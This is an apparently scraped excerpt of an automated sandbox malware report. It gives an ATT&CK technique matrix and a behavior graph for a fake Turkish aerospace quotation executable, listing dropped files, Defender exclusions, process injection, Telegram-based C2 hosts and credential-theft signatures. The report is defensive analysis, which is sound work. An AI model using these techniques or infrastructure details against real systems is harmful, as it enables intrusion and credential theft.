                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618934 Sample: T#U00fcrk Havac#U0131l#U013... Startdate: 19/02/2025 Architecture: WINDOWS Score: 100 56 reallyfreegeoip.org 2->56 58 api.telegram.org 2->58 60 2 other IPs or domains 2->60 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 17 other signatures 2->72 8 T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe 7 2->8         started        12 WheTgQY.exe 4 2->12         started        signatures3 68 Tries to detect the country of the analysis system (by using the IP) 56->68 70 Uses the Telegram API (likely for C&C communication) 58->70 process4 file5 42 C:\Users\user\AppData\Roaming\WheTgQY.exe, PE32 8->42 dropped 44 C:\Users\user\...\WheTgQY.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp957E.tmp, XML 8->46 dropped 48 T#U00fcrk Havac#U0...2-2025_xlsx.exe.log, ASCII 8->48 dropped 74 Adds a directory exclusion to Windows Defender 8->74 76 Injects a PE file into a foreign processes 8->76 14 powershell.exe 23 8->14         started        17 T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        78 Multi AV Scanner detection for dropped file 12->78 24 WheTgQY.exe 12->24         started        26 schtasks.exe 12->26         started        28 WheTgQY.exe 12->28         started        30 WheTgQY.exe 12->30         started        signatures6 process7 dnsIp8 80 Loading BitLocker PowerShell Module 14->80 32 conhost.exe 14->32         started        34 WmiPrvSE.exe 14->34         started        50 checkip.dyndns.com 132.226.8.169, 49707, 49711, 49712 UTMEMUS United States 17->50 52 api.telegram.org 149.154.167.220, 443, 49742, 49749 TELEGRAMRU United Kingdom 17->52 54 reallyfreegeoip.org 104.21.80.1, 443, 49708, 49710 CLOUDFLARENETUS United States 17->54 36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 40 conhost.exe 26->40         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.